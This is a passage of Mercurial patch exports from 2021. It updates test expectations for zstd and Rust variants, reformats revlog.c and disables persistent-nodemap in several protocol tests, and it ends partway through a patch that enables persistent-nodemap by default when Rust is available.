\x9a\xf4\xd1}[\xfb{,q\x14Kf\x06\x1e\x10\xd6\x17\xbbl\x90\x16\xb9\xb3\xd8\x07\xee\xfc\xa8\x8eI\x10]\x9c\x1ava\x054W\xad\xdf\xb3\x18\xee\xbdd\x15\xdf$\x85St\n\xde\xee?\x91\xa0\x83\x11\x08\xd8\x01\x80\x10B\x04\x00\x04S\x04B\xc7Tw\x9f\xb9,\x00\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', (zstd !) b'' ] @@ -100,21 +106,26 @@ response: gen[ { b'filecount': 2, - b'totalsize': 1111 + b'totalsize': 1111 (no-zstd !) + b'totalsize': 1118 (zstd !) }, { b'location': b'store', b'path': b'00manifest.i', - b'size': 584 + b'size': 584 (no-zstd !) + b'size': 588 (zstd !) }, - b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c\r\xca\xc1\x11\x00!\x08\x040\xdfV\x03+\xa2\x94\xb3\x8c\xd0\x7f\twy\x87\x03i\x95r\x96F6\xe5\x1c\x9a\x10-\x16\xba|\x07\xab\xe5\xd1\xf08s\\\x8d\xc2\xbeo)w\xa9\x8b;\xa2\xff\x95\x19\x02jB\xab\x0c\xea\xf3\x03\xcf\x1d\x16\t\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x8c\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xcd\xb9\rB1\x10\x00Q\xc7\xbf\x19\xf6\xb6\xdd\x08\xb9\xf7\x92H\xa9\x90\xd2\xb8\x82\xc9\x9e4c\x8c\xfb\xf8\xf7\xca\xc7\x13n16\x8a\x88\xb2\xd8\x818`\xb4=eF\xb9f\x17\xcc\x92\x94hR\xc0\xeb\xe7s(/\x02\xcb\xd8\x13K\tU m\t\x1f\xef\xb2D\x03\xa6\xb6\x14\xb2\xaf\xc7[\rw?\x16`\xce\xd0"\x9c,\xddK\xd0c/\rIX4\xc3\xbc\xe4\xef{ u\xcc\x8c\x9c\x93]\x0f\x9cM;\n\xb7\x12-X\x1c\x96\x9fuT\xc8\xf5\x06\x88\xa25W\x00\x00\x00\x00\x01\x0c\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', + b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c\r\xca\xc1\x11\x00!\x08\x040\xdfV\x03+\xa2\x94\xb3\x8c\xd0\x7f\twy\x87\x03i\x95r\x96F6\xe5\x1c\x9a\x10-\x16\xba|\x07\xab\xe5\xd1\xf08s\\\x8d\xc2\xbeo)w\xa9\x8b;\xa2\xff\x95\x19\x02jB\xab\x0c\xea\xf3\x03\xcf\x1d\x16\t\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x8c\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xcd\xb9\rB1\x10\x00Q\xc7\xbf\x19\xf6\xb6\xdd\x08\xb9\xf7\x92H\xa9\x90\xd2\xb8\x82\xc9\x9e4c\x8c\xfb\xf8\xf7\xca\xc7\x13n16\x8a\x88\xb2\xd8\x818`\xb4=eF\xb9f\x17\xcc\x92\x94hR\xc0\xeb\xe7s(/\x02\xcb\xd8\x13K\tU m\t\x1f\xef\xb2D\x03\xa6\xb6\x14\xb2\xaf\xc7[\rw?\x16`\xce\xd0"\x9c,\xddK\xd0c/\rIX4\xc3\xbc\xe4\xef{ u\xcc\x8c\x9c\x93]\x0f\x9cM;\n\xb7\x12-X\x1c\x96\x9fuT\xc8\xf5\x06\x88\xa25W\x00\x00\x00\x00\x01\x0c\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', (no-zstd !) + b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd V\xfd\x01\x00b\xc5\x0e\x0f\xc0\xd1\x00\xfb\x0c\xb9\xca\xdf\xb2R\xba!\xf2\xf6\x1d\x80\xd5\x95Yc\xef9DaT\xcefcM\xf1\x12\t\x84\xf3\x1a\x04\x04N\\\'S\xf2\'\x8cz5\xc5\x9f\xfa\x18\xf3\x82W\x1a\x83Y\xe8\xf0\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x91\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd \xccE\x04\x00bK\x1e\x17\xb0A0\xff\xff\x9b\xb5V\x99\x99\xfa\xb6\xae\xf5n),"\xf1\n\x02\xb5\x07\x82++\xd1]T\x1b3\xaa\x8e\x10+)R\xa6\\\x9a\x10\xab+\xb4\x8bB\x9f\x13U\xd4\x98\xbd\xde \x9a\xf4\xd1}[\xfb{,q\x14Kf\x06\x1e\x10\xd6\x17\xbbl\x90\x16\xb9\xb3\xd8\x07\xee\xfc\xa8\x8eI\x10]\x9c\x1ava\x054W\xad\xdf\xb3\x18\xee\xbdd\x15\xdf$\x85St\n\xde\xee?\x91\xa0\x83\x11\x08\xd8\x01\x80\x10B\x04\x00\x04S\x04B\xc7Tw\x9f\xb9,\x00\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', (zstd !) b'', { b'location': b'store', b'path': b'00changelog.i', - b'size': 527 + b'size': 527 (no-zstd !) + b'size': 530 (zstd !) }, - b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00N\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xc5\xc1\t\xc0 \x0c\x05\xd0{\xa6p\x03cjI\xd71\xf9\x11<H\xa1u\x7fJ\xf1]\x9eyu\x98\xa2\xb0Z\x88jk0\x11\x95z\xa0\xdb\x11\\\x81S\xfc*\xb4\xe2]\xc4\x89\t\xe3\xe1\xec;\xfc\x95\x1c\xbbN\xe4\xf7\x9cc%\xf9\x00S#\x19\x13\x00\x00\x00\x00\x00\xcc\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', + b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00N\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xc5\xc1\t\xc0 \x0c\x05\xd0{\xa6p\x03cjI\xd71\xf9\x11<H\xa1u\x7fJ\xf1]\x9eyu\x98\xa2\xb0Z\x88jk0\x11\x95z\xa0\xdb\x11\\\x81S\xfc*\xb4\xe2]\xc4\x89\t\xe3\xe1\xec;\xfc\x95\x1c\xbbN\xe4\xf7\x9cc%\xf9\x00S#\x19\x13\x00\x00\x00\x00\x00\xcc\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', (no-zstd !) + b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00Q\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd WE\x02\x00r\x04\x0f\x14\x90\x01\x0e#\xf7h$;NQC%\xf8f\xd7\xb1\x81\x8d+\x01\x16+)5\xa8\x19\xdaA\xae\xe3\x00\xe9v\xe2l\x05v\x19\x11\xd4\xc1onK\xa2\x17c\xb4\xf3\xe7 z\x13\x8f\x1c\xf3j4\x03\x03\x00`\x06\x84\x8b\x1a\n\x14\x00\x00\x00\x00\x00\xcf\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', (zstd !) b'' ] diff --git a/tests/test-wireproto-exchangev2.t b/tests/test-wireproto-exchangev2.t --- a/tests/test-wireproto-exchangev2.t +++ b/tests/test-wireproto-exchangev2.t @@ -1099,7 +1099,8 @@ $ cat clone-output | grep "received frame" received frame(size=9; request=1; stream=2; streamflags=stream-begin; type=stream-settings; flags=eos) received frame(size=11; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) - received frame(size=1275; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) + received frame(size=1275; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) (no-zstd !) + received frame(size=1283; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) (zstd !) received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) received frame(size=9; request=1; stream=2; streamflags=stream-begin; type=stream-settings; flags=eos) received frame(size=11; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) @@ -1196,7 +1197,8 @@ $ cat clone-output | grep "received frame" received frame(size=9; request=1; stream=2; streamflags=stream-begin; type=stream-settings; flags=eos) received frame(size=11; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) - received frame(size=1275; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) + received frame(size=1275; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) (no-zstd !) + received frame(size=1283; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) (zstd !) received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) received frame(size=9; request=1; stream=2; streamflags=stream-begin; type=stream-settings; flags=eos) received frame(size=11; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617905159 -7200 # Thu Apr 08 20:05:59 2021 +0200 # Node ID 651e6df2b0a45d39d7605aaf65a893318ca68d0c # Parent 84a93fa7ecfd9e6509d08824e2d11831e582a2fd clang-format: run the formatter on mercurial/cext/revlog.c This fix `test-check-clang-format.t` that has been complaining for a while. Differential Revision: https://phab.mercurial-scm.org/D10327 diff --git a/mercurial/cext/revlog.c b/mercurial/cext/revlog.c --- a/mercurial/cext/revlog.c +++ b/mercurial/cext/revlog.c @@ -115,12 +115,10 @@ #if LONG_MAX == 0x7fffffffL static const char *const v1_tuple_format = PY23("Kiiiiiis#", "Kiiiiiiy#"); -static const char *const v2_tuple_format = - PY23("Kiiiiiis#Ki", "Kiiiiiiy#Ki"); +static const char *const v2_tuple_format = PY23("Kiiiiiis#Ki", "Kiiiiiiy#Ki"); #else static const char *const v1_tuple_format = PY23("kiiiiiis#", "kiiiiiiy#"); -static const char *const v2_tuple_format = - PY23("kiiiiiis#ki", "kiiiiiiy#ki"); +static const char *const v2_tuple_format = PY23("kiiiiiis#ki", "kiiiiiiy#ki"); #endif /* A RevlogNG v1 index entry is 64 bytes long. */ @@ -407,10 +405,11 @@ return NULL; } } else { - if (!PyArg_ParseTuple( - obj, v2_tuple_format, &offset_flags, &comp_len, - &uncomp_len, &base_rev, &link_rev, &parent_1, &parent_2, - &c_node_id, &c_node_id_len, &sidedata_offset, &sidedata_comp_len)) { + if (!PyArg_ParseTuple(obj, v2_tuple_format, &offset_flags, + &comp_len, &uncomp_len, &base_rev, + &link_rev, &parent_1, &parent_2, + &c_node_id, &c_node_id_len, + &sidedata_offset, &sidedata_comp_len)) { PyErr_SetString(PyExc_TypeError, "10-tuple required"); return NULL; } @@ -467,11 +466,11 @@ int rev; Py_ssize_t sidedata_comp_len; char *data; - #if LONG_MAX == 0x7fffffffL - const char *const sidedata_format = PY23("nKi", "nKi"); - #else - const char *const sidedata_format = PY23("nki", "nki"); - #endif +#if LONG_MAX == 0x7fffffffL + const char *const sidedata_format = PY23("nKi", "nKi"); +#else + const char *const sidedata_format = PY23("nki", "nki"); +#endif if (self->hdrsize == v1_hdrsize || self->inlined) { /* @@ -499,12 +498,12 @@ return NULL; } - /* Find the newly added node, offset from the "already on-disk" length */ + /* Find the newly added node, offset from the "already on-disk" length + */ data = self->added + self->hdrsize * (rev - self->length); putbe64(sidedata_offset, data + 64); putbe32(sidedata_comp_len, data + 72); - Py_RETURN_NONE; } @@ -2724,9 +2723,9 @@ Py_BuildValue(PY23("iiiiiiis#", "iiiiiiiy#"), 0, 0, 0, -1, -1, -1, -1, nullid, self->nodelen); } else { - self->nullentry = Py_BuildValue( - PY23("iiiiiiis#ii", "iiiiiiiy#ii"), 0, 0, 0, -1, -1, -1, - -1, nullid, self->nodelen, 0, 0); + self->nullentry = + Py_BuildValue(PY23("iiiiiiis#ii", "iiiiiiiy#ii"), 0, 0, 0, + -1, -1, -1, -1, nullid, self->nodelen, 0, 0); } if (!self->nullentry) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617930907 -7200 # Fri Apr 09 03:15:07 2021 +0200 # Node ID a8fa270a0e86d3b1bbf1398734a9b6eb86b6c165 # Parent 651e6df2b0a45d39d7605aaf65a893318ca68d0c persistent-nodemap: disable it unconditionally for test-http-bad-server.t This is not relevant for the test and this will avoid a lot of variations Differential Revision: https://phab.mercurial-scm.org/D10331 diff --git a/tests/test-http-bad-server.t b/tests/test-http-bad-server.t --- a/tests/test-http-bad-server.t +++ b/tests/test-http-bad-server.t @@ -13,6 +13,7 @@ > fakeversion = `pwd`/fakeversion.py > [format] > sparse-revlog = no + > use-persistent-nodemap = no > [devel] > legacy.exchange = phases > [server] # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617932685 -7200 # Fri Apr 09 03:44:45 2021 +0200 # Node ID 1a85c5d75d53b0ec8b348c4dd2e5025d6d210ede # Parent a8fa270a0e86d3b1bbf1398734a9b6eb86b6c165 persistent-nodemap: disable it unconditionally for test-http-protocol.t This is not relevant for the test and this will avoid a lot of variations. Differential Revision: https://phab.mercurial-scm.org/D10332 diff --git a/tests/test-http-protocol.t b/tests/test-http-protocol.t --- a/tests/test-http-protocol.t +++ b/tests/test-http-protocol.t @@ -1,8 +1,13 @@ #require no-chg +persistent-nodemap is not enabled by default. It is not relevant for this test +so disable it. + $ . $TESTDIR/wireprotohelpers.sh $ cat >> $HGRCPATH << EOF + > [format] + > use-persistent-nodemap = no > [web] > push_ssl = false > allow_push = * # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617934387 -7200 # Fri Apr 09 04:13:07 2021 +0200 # Node ID f8f738c24d2f836b3f2148b2dfde9f7c1ae15d3c # Parent 1a85c5d75d53b0ec8b348c4dd2e5025d6d210ede persistent-nodemap: disable it unconditionally for test-share-safe.t This is not relevant for the test and this will avoid a lot of variations. Differential Revision: https://phab.mercurial-scm.org/D10333 diff --git a/tests/test-share-safe.t b/tests/test-share-safe.t --- a/tests/test-share-safe.t +++ b/tests/test-share-safe.t @@ -10,6 +10,8 @@ > # enforce zlib to ensure we can upgrade to zstd later > [format] > revlog-compression=zlib + > # we want to be able to enable it later + > use-persistent-nodemap=no > EOF prepare source repo # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617933095 -7200 # Fri Apr 09 03:51:35 2021 +0200 # Node ID a0d152e5ac17e7e068e0feed7d843bb1bc34172a # Parent f8f738c24d2f836b3f2148b2dfde9f7c1ae15d3c persistent-nodemap: disable it unconditionally for test-ssh-proto.t This is not relevant for the test and this will avoid a lot of variations. Differential Revision: https://phab.mercurial-scm.org/D10334 diff --git a/tests/test-ssh-proto.t b/tests/test-ssh-proto.t --- a/tests/test-ssh-proto.t +++ b/tests/test-ssh-proto.t @@ -1,5 +1,12 @@ #require no-chg +persistent-nodemap is not enabled by default. It is not relevant for this test so disable it. + + $ cat << EOF >> $HGRCPATH + > [format] + > use-persistent-nodemap = no + > EOF + $ cat > hgrc-sshv2 << EOF > %include $HGRCPATH > [experimental] # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617933085 -7200 # Fri Apr 09 03:51:25 2021 +0200 # Node ID 8bf21b3869cd68f7519f468aa454d728ccba3a3d # Parent a0d152e5ac17e7e068e0feed7d843bb1bc34172a persistent-nodemap: disable it unconditionally for test-ssh-proto-unbundle.t This is not relevant for the test and this will avoid a lot of variations. Differential Revision: https://phab.mercurial-scm.org/D10335 diff --git a/tests/test-ssh-proto-unbundle.t b/tests/test-ssh-proto-unbundle.t --- a/tests/test-ssh-proto-unbundle.t +++ b/tests/test-ssh-proto-unbundle.t @@ -1,3 +1,10 @@ +persistent-nodemap is not enabled by default. It is not relevant for this test so disable it. + + $ cat << EOF >> $HGRCPATH + > [format] + > use-persistent-nodemap = no + > EOF + $ cat > hgrc-sshv2 << EOF > %include $HGRCPATH > [experimental] # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617932167 -7200 # Fri Apr 09 03:36:07 2021 +0200 # Node ID 06ebf0cc4f70241edb24500582167e1ec8a3d249 # Parent 8bf21b3869cd68f7519f468aa454d728ccba3a3d persistent-nodemap: disable it unconditionally for test-wireproto-caching.t This is not relevant for the test and this will avoid a lot of variations. Differential Revision: https://phab.mercurial-scm.org/D10336 diff --git a/tests/test-wireproto-caching.t b/tests/test-wireproto-caching.t --- a/tests/test-wireproto-caching.t +++ b/tests/test-wireproto-caching.t @@ -1,5 +1,10 @@ $ . $TESTDIR/wireprotohelpers.sh + +persistent-nodemap is not enabled by default. It is not relevant for this test so disable it. + $ cat >> $HGRCPATH << EOF + > [format] + > use-persistent-nodemap = no > [extensions] > blackbox = > [blackbox] # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617931818 -7200 # Fri Apr 09 03:30:18 2021 +0200 # Node ID 1b98c95720523ad7848431458309d39251397665 # Parent 06ebf0cc4f70241edb24500582167e1ec8a3d249 persistent-nodemap: disable it for test-wireproto-command-capabilities.t This is not relevant for the test and this will avoid a lot of variations. Differential Revision: https://phab.mercurial-scm.org/D10337 diff --git a/tests/test-wireproto-command-capabilities.t b/tests/test-wireproto-command-capabilities.t --- a/tests/test-wireproto-command-capabilities.t +++ b/tests/test-wireproto-command-capabilities.t @@ -2,6 +2,13 @@ $ . $TESTDIR/wireprotohelpers.sh +persistent-nodemap is not enabled by default. It is not relevant for this test so disable it. + + $ cat >> $HGRCPATH << EOF + > [format] + > use-persistent-nodemap = no + > EOF + $ hg init server zstd isn't present in plain builds. Make tests easier by removing # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617932184 -7200 # Fri Apr 09 03:36:24 2021 +0200 # Node ID df76da69f5b1ff854f72f4d0d1c8e624138d8073 # Parent 1b98c95720523ad7848431458309d39251397665 persistent-nodemap: disable it for test-wireproto-content-redirects.t This is not relevant for the test and this will avoid a lot of variations. Differential Revision: https://phab.mercurial-scm.org/D10338 diff --git a/tests/test-wireproto-content-redirects.t b/tests/test-wireproto-content-redirects.t --- a/tests/test-wireproto-content-redirects.t +++ b/tests/test-wireproto-content-redirects.t @@ -1,6 +1,10 @@ $ . $TESTDIR/wireprotohelpers.sh +persistent-nodemap is not enabled by default. It is not relevant for this test so disable it. + $ cat >> $HGRCPATH << EOF + > [format] + > use-persistent-nodemap = no > [extensions] > blackbox = > [blackbox] # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1610596700 -3600 # Thu Jan 14 04:58:20 2021 +0100 # Node ID cc3ad5c3af3bfabcaaacd2b4cc38cf865bc5be07 # Parent df76da69f5b1ff854f72f4d0d1c8e624138d8073 persistent-nodemap: enable the feature by default when using Rust As discussed at the 5.6 sprint, we can make it enabled by default, but only for Rust installation. Differential Revision: https://phab.mercurial-scm.org/D9765 diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -1325,10 +1325,22 @@ b'usestore', default=True, ) + + +def _persistent_nodemap_default(): + """compute `use-persistent-nodemap` default value + + The feature is disabled unless a fast implementation is available. + """ + from . import policy + + return policy.importrust('revlog') is not None + + coreconfigitem( b'format', b'use-persistent-nodemap', - default=False, + default=_persistent_nodemap_default, ) # TODO needs to grow a docket file to at least store the last offset of the data # file when rewriting sidedata. diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -910,7 +910,8 @@ Repository with this on-disk format require Mercurial version 5.4 or above. - Disabled by default. + By default this format variant is disabled if fast implementation is not + available and enabled by default if the fast implementation is available. ``use-share-safe`` Enforce "safe" behaviors for all "shares" that access this repository. diff --git a/tests/test-bundle.t b/tests/test-bundle.t --- a/tests/test-bundle.t +++ b/tests/test-bundle.t @@ -297,19 +297,27 @@ $ hg -R test debugcreatestreamclonebundle packed.hg writing 2664 bytes for 6 files (no-zstd !) writing 2665 bytes for 6 files (zstd !) - bundle requirements: generaldelta, revlogv1, sparserevlog + bundle requirements: generaldelta, revlogv1, sparserevlog (no-rust !) + bundle requirements: generaldelta, persistent-nodemap, revlogv1, sparserevlog (rust !) $ f -B 64 --size --sha1 --hexdump packed.hg packed.hg: size=2840, sha1=12bf3eee3eb8a04c503ce2d29b48f0135c7edff5 (no-zstd !) - packed.hg: size=2841, sha1=8b645a65f49b0ae43042a9f3da56d4bfdf1c7f99 (zstd !) + packed.hg: size=2841, sha1=8b645a65f49b0ae43042a9f3da56d4bfdf1c7f99 (zstd no-rust !) + packed.hg: size=2860, sha1=81d7a2e535892cda51e82c200f818de2cca828d3 (rust !) 0000: 48 47 53 31 55 4e 00 00 00 00 00 00 00 06 00 00 |HGS1UN..........| 0010: 00 00 00 00 